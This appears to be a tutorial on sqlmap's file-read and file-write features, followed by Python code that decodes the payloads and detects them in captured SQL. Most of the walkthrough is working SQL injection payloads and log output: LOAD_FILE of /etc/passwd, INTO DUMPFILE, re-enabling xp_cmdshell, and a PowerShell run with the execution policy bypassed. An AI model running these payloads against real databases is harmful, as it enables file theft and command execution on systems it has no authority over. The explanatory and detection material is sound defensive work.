【Sqlmap】file-read and file-write

--file-read


Supported when the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current database user has the privilege to use the specific functions involved. The file read can be either text or binary.
MySQL

E:\Python27\sqlmap>python sqlmap.py -r r.txt --file-read "/etc/passwd" -v 3
[14:36:26] [INFO] fingerprinting the back-end DBMS operating system
[14:36:26] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71706b7871,(CASE WHEN (0x57=UPPER(MID(@@version_compile_os,1,1))) THEN 1 ELSE 0 END),0x71707a7a71)-- skrs

[14:36:26] [WARNING] reflective value(s) found and filtering out
[14:36:26] [DEBUG] performed 1 queries in 0.02 seconds
[14:36:26] [INFO] the back-end DBMS operating system is Linux
[14:36:26] [DEBUG] going to read the file with a non-stacked query SQL injection technique
[14:36:26] [INFO] fetching file: '/etc/passwd'
[14:36:26] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71706b7871,IFNULL(CAST(HEX(LOAD_FILE(0x2f6574632f706173737764)) AS CHAR),0x20),0x71707a7a71)-- pgzu
[14:36:26] [DEBUG] performed 1 queries in 0.02 seconds


MSSQL
BULK INSERT copies a data file into a database table or view in a user-specified format.

[14:53:20] [INFO] fetching file: 'C:/pass.txt'
[14:53:20] [PAYLOAD] xxxxx';DROP TABLE sqlmapfile--
[14:53:20] [PAYLOAD] xxxxx';CREATE TABLE sqlmapfile(data text)--
[14:53:20] [PAYLOAD] xxxxx';DROP TABLE sqlmapfilehex--
[14:53:20] [PAYLOAD] xxxxx';CREATE TABLE sqlmapfilehex(id INT IDENTITY(1, 1) PRIMARY KEY, data VARCHAR(4096))--
[14:53:20] [DEBUG] loading the content of file 'C:/pass.txt' into support table
[14:53:20] [PAYLOAD] xxxxx';BULK INSERT sqlmapfile FROM 'C:/pass.txt' WITH (CODEPAGE='RAW', FIELDTERMINATOR='ECPYscXqbX',ROWTERMINATOR='mrvcIRNcNx')--

Then the content is converted to hexadecimal:

[14:53:20] [PAYLOAD] xxxxx';DECLARE @charset VARCHAR(16) DECLARE @counter INT DECLARE @hexstr VARCHAR(4096) DECLARE @length INT DECLARE @chunk INT SET @charset = '0123456789ABCDEF' SET @counter = 1 SET @hexstr = '' SET @length = (SELECT DATALENGTH(data) FROM sqlmapfile) SET @chunk = 1024 WHILE (@counter <= @length) BEGIN DECLARE @tempint INT DECLARE @firstint INT DECLARE @secondint INT SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(data, @counter, 1)) FROM sqlmapfile)) SET @firstint = floor(@tempint/16) SET @secondint = @tempint - (@firstint * 16) SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1) SET @counter = @counter + 1 IF @counter % @chunk = 0 BEGIN INSERT INTO sqlmapfilehex(data) VALUES(@hexstr) SET @hexstr = '' END END IF @counter % (@chunk) != 0 BEGIN INSERT INTO sqlmapfilehex(data) VALUES(@hexstr) END --

That line is too long to read; what is actually executed is:

DECLARE @charset VARCHAR(16) 
DECLARE @counter INT 
DECLARE @hexstr VARCHAR(4096) 
DECLARE @length INT 
DECLARE @chunk INT 
SET @charset = '0123456789ABCDEF' 
SET @counter = 1 
SET @hexstr = '' 
SET @length = (SELECT DATALENGTH(data) FROM sqlmapfile) 
SET @chunk = 1024 
WHILE (@counter <= @length) 
BEGIN 
DECLARE @tempint INT 
DECLARE @firstint INT 
DECLARE @secondint INT 
SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(data, @counter, 1)) FROM sqlmapfile)) 
SET @firstint = floor(@tempint/16) 
SET @secondint = @tempint - (@firstint * 16) 
SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1) 
SET @counter = @counter + 1 
IF @counter % @chunk = 0 
BEGIN 
INSERT INTO sqlmapfilehex(data) VALUES(@hexstr) SET @hexstr = '' 
END 
END 
IF @counter % (@chunk) != 0 
BEGIN 
INSERT INTO sqlmapfilehex(data) VALUES(@hexstr) 
END --
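To see what that loop produces row by row, here is a Python model of it, added as an example (it is not sqlmap's code; sqlmap generates the T-SQL above). It keeps the T-SQL variable names and the 1-based @counter and reproduces the chunking rule exactly, which makes one quirk visible: because the insert fires when the already-incremented counter is a multiple of @chunk, the first row holds 1023 bytes and every later full row holds 1024, so no row exceeds 2048 hex characters and fits the VARCHAR(4096) column of sqlmapfilehex. Modelling ASCII(SUBSTRING(...)) as the raw byte value assumes a single-byte collation. The reassemble() helper is the client-side step of joining the fetched rows and hex-decoding them; the sample input is constructed.

```python
def hex_chunks(data, chunk=1024):
    """Python model of the T-SQL hex-encoding loop above (added example).

    'data' stands for the single-row sqlmapfile.data column; ASCII(SUBSTRING(...))
    is modelled as the raw byte value, which assumes a single-byte collation.
    Returns the rows that would be inserted into sqlmapfilehex, in order.
    """
    charset = "0123456789ABCDEF"
    rows = []
    hexstr = ""
    counter = 1                      # @counter is 1-based, like SUBSTRING()
    length = len(data)               # DATALENGTH(data)
    while counter <= length:
        tempint = data[counter - 1]  # ASCII(SUBSTRING(data, @counter, 1))
        firstint = tempint // 16     # floor(@tempint/16)
        secondint = tempint - firstint * 16
        hexstr += charset[firstint] + charset[secondint]
        counter += 1
        if counter % chunk == 0:     # flush when the *incremented* counter is a multiple of @chunk
            rows.append(hexstr)
            hexstr = ""
    if counter % chunk != 0:         # trailing partial row (an empty row for an empty file)
        rows.append(hexstr)
    return rows


def reassemble(rows):
    """Client-side counterpart: join the fetched rows and hex-decode them."""
    return bytes.fromhex("".join(rows))


if __name__ == "__main__":
    sample = b"root:x:0:0:root:/root:/bin/bash\n" * 100   # constructed input, 3200 bytes
    rows = hex_chunks(sample)
    print([len(r) // 2 for r in rows])                     # bytes per row: [1023, 1024, 1024, 129]
    assert reassemble(rows) == sample
```

The row sizes explain the queries that follow: sqlmap first asks for COUNT(*) of sqlmapfilehex, then fetches each row in order and decodes the hex on the client.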


[14:53:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[14:53:20] [PAYLOAD] xxxxx' AND 4689 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(*) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapfilehex)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)))-- jpEC

[14:53:20] [DEBUG] performed 1 queries in 0.13 seconds
[14:53:20] [PAYLOAD] xxxxx' AND 3925 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM sqlmapfilehex WHERE data NOT IN (SELECT TOP 0 data FROM sqlmapfilehex ORDER BY id ASC) ORDER BY id ASC)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)))-- pyFU


--file-write, --file-dest


Supported when the back-end DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current database user has the privilege to use the specific functions involved. The uploaded file can be either text or binary.
MySQL
MySQL uses INTO DUMPFILE.

E:\Python27\sqlmap>python sqlmap.py -r r.txt --file-write "C:\pass.txt" --file-dest "/tmp/123" -v 3
[15:49:12] [INFO] fingerprinting the back-end DBMS operating system
[15:49:12] [DEBUG] performed 0 queries in 0.00 seconds
[15:49:12] [INFO] the back-end DBMS operating system is Linux
[15:49:12] [DEBUG] going to upload the file 'binary' with UNION query SQL injection technique
[15:49:12] [DEBUG] encoding file to its hexadecimal string value
[15:49:12] [DEBUG] exporting the binary file content to file '/tmp/123'
[15:49:12] [PAYLOAD] -7595' UNION ALL SELECT 0x48656865313233343536,NULL INTO DUMPFILE '/tmp/123'-- JTLs

MSSQL
Uploading a file on MSSQL requires xp_cmdshell, so the first step is enabling xp_cmdshell:

[15:52:01] [PAYLOAD] xxxxx';DECLARE @rkfp VARCHAR(8000);SET @rkfp=0x70696e67202d6e203130203132372e302e302e31;EXEC master..xp_cmdshell @rkfp--
xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n]
[15:52:20] [DEBUG] configuring xp_cmdshell using sp_configure stored procedure
[15:52:20] [PAYLOAD] xxxxx';EXEC master..sp_configure 'SHOW advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'SHOW advanced options',0; RECONFIGURE WITH OVERRIDE--
[15:52:20] [PAYLOAD] xxxxx';DECLARE @aapn VARCHAR(8000);SET @aapn=0x70696e67202d6e203130203132372e302e302e31;EXEC master..xp_cmdshell @aapn--
[15:52:30] [INFO] xp_cmdshell re-enabled successfully
[15:52:30] [DEBUG] creating a support table to write commands standard output to

Then it tests whether xp_cmdshell is usable:

[15:52:30] [PAYLOAD] xxxxx';DROP TABLE sqlmapoutput--
[15:52:30] [PAYLOAD] xxxxx';CREATE TABLE sqlmapoutput(id INT PRIMARY KEY IDENTITY, data NVARCHAR(4000))--
[15:52:30] [INFO] testing if xp_cmdshell extended procedure is usable
[15:52:30] [PAYLOAD] xxxxx';DECLARE @umst VARCHAR(8000);SET @umst=0x6563686f2031;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @umst--
[15:52:30] [PAYLOAD] xxxxx' AND 7646 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(data) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)))-- JgAK
[15:52:30] [INFO] the SQL query used returns 1 entries
[15:52:30] [PAYLOAD] xxxxx' AND 8217 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM sqlmapoutput WHERE id NOT IN (SELECT TOP 0 id FROM sqlmapoutput ORDER BY id) ORDER BY id)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)))-- zCxp
[15:52:30] [DEBUG] performed 2 queries in 0.12 seconds
[15:52:30] [PAYLOAD] xxxxx';DELETE FROM sqlmapoutput--
[15:52:30] [INFO] xp_cmdshell extended procedure is usable

Next it looks up the MSSQL log directory; the query actually executed is:

select SERVERPROPERTY('ErrorLogFileName')
[15:52:30] [DEBUG] identifying Microsoft SQL Server error log directory that sqlmap will use to store temporary files with commands' output
[15:52:30] [PAYLOAD] xxxxx' AND 9706 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT SUBSTRING((ISNULL(CAST(SERVERPROPERTY(CHAR(69)+CHAR(114)+CHAR(114)+CHAR(111)+CHAR(114)+CHAR(76)+CHAR(111)+CHAR(103)+CHAR(70)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(78)+CHAR(97)+CHAR(109)+CHAR(101)) AS NVARCHAR(4000)),CHAR(32))),1,1024))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)))-- weXH
[15:52:30] [INFO] retrieved: E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\ERRORLOG
[15:52:30] [DEBUG] performed 1 queries in 0.03 seconds
[15:52:30] [DEBUG] going to use 'E:/Program Files/Microsoft SQL Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log' as temporary files directory

Writing the file into the Log directory:

[15:52:30] [INFO] using PowerShell to write the binary file content to file 'C:\666.txt'
[15:52:30] [DEBUG] uploading the base64-encoded file to E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpfghpl.txt, please wait..
[15:52:30] [PAYLOAD] xxxxx';DECLARE @dsqz VARCHAR(8000);SET @dsqz=0x6563686f205347566f5a5445794d7a51314e673d3d203e3e2022453a5c50726f6772616d2046696c65735c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d70666768706c2e74787422;EXEC master..xp_cmdshell @dsqz--

The command actually executed is:

echo SGVoZTEyMzQ1Ng== >> "E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpfghpl.txt"
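The manual decoding above generalises: every 0x... string literal and every CHAR(n)+CHAR(n) chain in the -v 3 payloads can be recovered mechanically, which is what an analyst does when the same payloads turn up in a WAF, proxy or database capture. The following Python is an added example, not part of this post and not sqlmap's code. It decodes the hex literals (the MySQL CONCAT markers, the LOAD_FILE argument, the INTO DUMPFILE content and the commands handed to xp_cmdshell), the CHAR() chains the MSSQL payloads use, and the base64 token inside the echo staging command, using payloads copied from the log excerpts above as its sample input. Two things it makes visible: the first xp_cmdshell payload is a local ping used as a delay probe, and the MySQL DUMPFILE literal and the MSSQL base64 token carry the same file content.

```python
import base64
import re

# Regexes for the three encodings that appear in the -v 3 payload lines above.
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)")
# The lookbehind keeps VARCHAR(16) / NVARCHAR(4000) from being read as CHAR() calls.
CHAR_RUN = re.compile(r"(?:(?<![A-Za-z])CHAR\(\d{1,3}\)\+?)+")
CHAR_ONE = re.compile(r"CHAR\((\d{1,3})\)")
ECHO_B64 = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*>>")


def decode_hex_literals(payload):
    """Return the text of every even-length 0x... literal in a payload, in order.

    MySQL and MSSQL both treat 0x... as a binary string, which is how sqlmap
    passes file paths, file content and xp_cmdshell commands without quotes.
    """
    decoded = []
    for match in HEX_LITERAL.finditer(payload):
        digits = match.group(1)
        if len(digits) % 2:          # odd length: a numeric literal, not a string
            continue
        decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded


def decode_char_chains(payload):
    """Return every CHAR(n)+CHAR(n)+... run as the string it concatenates to."""
    chains = []
    for run in CHAR_RUN.finditer(payload):
        codes = CHAR_ONE.findall(run.group(0))
        chains.append("".join(chr(int(code)) for code in codes))
    return chains


def recover_staged_content(command):
    """Given a decoded 'echo <base64> >> file' staging command, return the file
    bytes being written, or None when the command carries no such token."""
    match = ECHO_B64.search(command)
    return base64.b64decode(match.group(1)) if match else None


# Sample inputs: payload strings copied from the sqlmap log excerpts above.
MYSQL_READ = ("1' UNION ALL SELECT NULL,CONCAT(0x71706b7871,IFNULL(CAST(HEX(LOAD_FILE("
              "0x2f6574632f706173737764)) AS CHAR),0x20),0x71707a7a71)-- pgzu")
MYSQL_WRITE = "-7595' UNION ALL SELECT 0x48656865313233343536,NULL INTO DUMPFILE '/tmp/123'-- JTLs"
MSSQL_PROBE = ("xxxxx';DECLARE @rkfp VARCHAR(8000);SET @rkfp=0x70696e67202d6e203130203132372e302e302e31;"
               "EXEC master..xp_cmdshell @rkfp--")
MSSQL_ERRORLOG = ("xxxxx' AND 9706 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+"
                  "(SELECT SUBSTRING((ISNULL(CAST(SERVERPROPERTY(CHAR(69)+CHAR(114)+CHAR(114)+CHAR(111)+"
                  "CHAR(114)+CHAR(76)+CHAR(111)+CHAR(103)+CHAR(70)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(78)+"
                  "CHAR(97)+CHAR(109)+CHAR(101)) AS NVARCHAR(4000)),CHAR(32))),1,1024))+CHAR(113)+"
                  "CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)))-- weXH")
MSSQL_STAGE = ("xxxxx';DECLARE @dsqz VARCHAR(8000);SET @dsqz=0x6563686f205347566f5a5445794d7a51314e673d3d"
               "203e3e2022453a5c50726f6772616d2046696c65735c4d6963726f736f66742053514c205365727665725c"
               "4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d70666768706c2e74787422;"
               "EXEC master..xp_cmdshell @dsqz--")


if __name__ == "__main__":
    for label, payload in [("MySQL read", MYSQL_READ), ("MySQL write", MYSQL_WRITE),
                           ("MSSQL probe", MSSQL_PROBE), ("MSSQL staging", MSSQL_STAGE)]:
        print(label, decode_hex_literals(payload))
    print("MSSQL errorlog", decode_char_chains(MSSQL_ERRORLOG))
    staged = recover_staged_content(decode_hex_literals(MSSQL_STAGE)[0])
    print("staged file content:", staged)
```

The five-character strings such as qpkxq / qpzzq and qjxzq / qzzqq are the boundary markers sqlmap wraps around extracted data so it can find the result in the page; seeing a pair of them in a request is itself a strong sign of sqlmap, independent of the file operation.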

Then PowerShell is used to decode the base64 file; first the PowerShell script is written:

[15:52:30] [DEBUG] uploading the PowerShell base64-decoding script to E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmppsepgs.ps1
[15:52:30] [PAYLOAD] xxxxx';DECLARE @iumo VARCHAR(8000);SET @iumo=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;EXEC master..xp_cmdshell @iumo--
[15:52:30] [DEBUG] executing the PowerShell base64-decoding script to write the C:\666.txt file, please wait..

What is actually executed is:

echo $Base64 = Get-Content -Path "E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpfghpl.txt"; $Base64 = $Base64 -replace "`t|`n|`r",""; $Content = [System.Convert]::FromBase64String($Base64); Set-Content -Path "C:\666.txt" -Value $Content -Encoding Byte >> "E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmppsepgs.ps1"

Then the script is run and the leftover temporary files are deleted.

[15:52:30] [PAYLOAD] xxxxx';DECLARE @wpll VARCHAR(8000);SET @wpll=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;EXEC master..xp_cmdshell @wpll--

What is actually executed is:

powershell -ExecutionPolicy ByPass -File "E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmppsepgs.ps1" & del /F /Q "E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpfghpl.txt" & del /F /Q "E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmppsepgs.ps1"
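From the defender's side, every step walked through above leaves recognisable statements in whatever captures the SQL text (SQL Server Audit or Extended Events, a database firewall, the MySQL general log). The following Python is an added example, not part of the post and not sqlmap's code: it runs a small set of indicator rules derived from the payloads above over a constructed list of captured statements (the sqlmap ones copied from the log excerpts, plus two benign queries) and reports which statements fired which rule. The rule names are this example's own. Two facts frame the rules: on MySQL, LOAD_FILE and INTO DUMPFILE require the FILE privilege and are bounded by secure_file_priv, so restricting both is the preventive counterpart; on MSSQL, xp_cmdshell is disabled by default, which is why sqlmap has to re-enable it through sp_configure, and that reconfiguration is itself a high-value audit event.

```python
import re

# Indicator rules as (name, regex) pairs, derived from the sqlmap behaviour
# documented above. The names are this example's own, not sqlmap terminology.
INDICATORS = [
    # support tables sqlmap creates for --file-read (sqlmapfile, sqlmapfilehex)
    # and for xp_cmdshell output (sqlmapoutput)
    ("sqlmap_support_table",
     re.compile(r"\bsqlmap(?:filehex|file|output)\b", re.I)),
    # BULK INSERT from a file path is how the file is pulled into the table
    ("bulk_insert_from_file",
     re.compile(r"\bBULK\s+INSERT\b.*\bFROM\s+'", re.I)),
    # re-enabling xp_cmdshell; strong signal on its own
    ("xp_cmdshell_enabled_via_sp_configure",
     re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("xp_cmdshell_reference",
     re.compile(r"\bxp_cmdshell\b", re.I)),
    # sqlmap asks for the error-log path to pick a writable temp directory;
    # weak alone (admin tooling asks the same), useful in combination
    ("errorlog_path_probe",
     re.compile(r"SERVERPROPERTY\s*\(\s*'ErrorLogFileName'", re.I)),
    ("mysql_load_file",
     re.compile(r"\bLOAD_FILE\s*\(", re.I)),
    ("mysql_into_dumpfile",
     re.compile(r"\bINTO\s+(?:DUMPFILE|OUTFILE)\b", re.I)),
    # long hex string literals carry paths, file content and commands
    ("long_hex_literal",
     re.compile(r"0x[0-9A-Fa-f]{16,}")),
]


def scan_statements(statements):
    """Return (line_number, indicator_name) for every rule that matches a statement."""
    hits = []
    for lineno, stmt in enumerate(statements, start=1):
        for name, pattern in INDICATORS:
            if pattern.search(stmt):
                hits.append((lineno, name))
    return hits


def summarize(hits):
    """Group hits per statement so an analyst sees which lines fired and why."""
    by_line = {}
    for lineno, name in hits:
        by_line.setdefault(lineno, []).append(name)
    return by_line


# Constructed capture: sqlmap statements copied from the excerpts above,
# interleaved with benign application queries.
SAMPLE_STATEMENTS = [
    "SELECT name, create_date FROM sys.tables WHERE name = 'orders'",
    "xxxxx';CREATE TABLE sqlmapfilehex(id INT IDENTITY(1, 1) PRIMARY KEY, data VARCHAR(4096))--",
    "xxxxx';BULK INSERT sqlmapfile FROM 'C:/pass.txt' WITH (CODEPAGE='RAW', "
    "FIELDTERMINATOR='ECPYscXqbX',ROWTERMINATOR='mrvcIRNcNx')--",
    "xxxxx';EXEC master..sp_configure 'SHOW advanced options',1; RECONFIGURE WITH OVERRIDE; "
    "EXEC master..sp_configure 'xp_cmdshell',1; RECONFIGURE WITH OVERRIDE--",
    "xxxxx';DECLARE @rkfp VARCHAR(8000);SET @rkfp=0x70696e67202d6e203130203132372e302e302e31;"
    "EXEC master..xp_cmdshell @rkfp--",
    "1' UNION ALL SELECT NULL,CONCAT(0x71706b7871,IFNULL(CAST(HEX(LOAD_FILE(0x2f6574632f706173737764)) "
    "AS CHAR),0x20),0x71707a7a71)-- pgzu",
    "-7595' UNION ALL SELECT 0x48656865313233343536,NULL INTO DUMPFILE '/tmp/123'-- JTLs",
    "SELECT id, total FROM orders WHERE customer_id = 42",
    "select SERVERPROPERTY('ErrorLogFileName')",
]


if __name__ == "__main__":
    for lineno, names in sorted(summarize(scan_statements(SAMPLE_STATEMENTS)).items()):
        print(f"line {lineno}: {', '.join(names)}")
```

Rules that fire alone (the error-log probe, a single long hex literal) belong in a scoring scheme rather than an alert; the support-table names, BULK INSERT from a file and the sp_configure change are specific enough to page on.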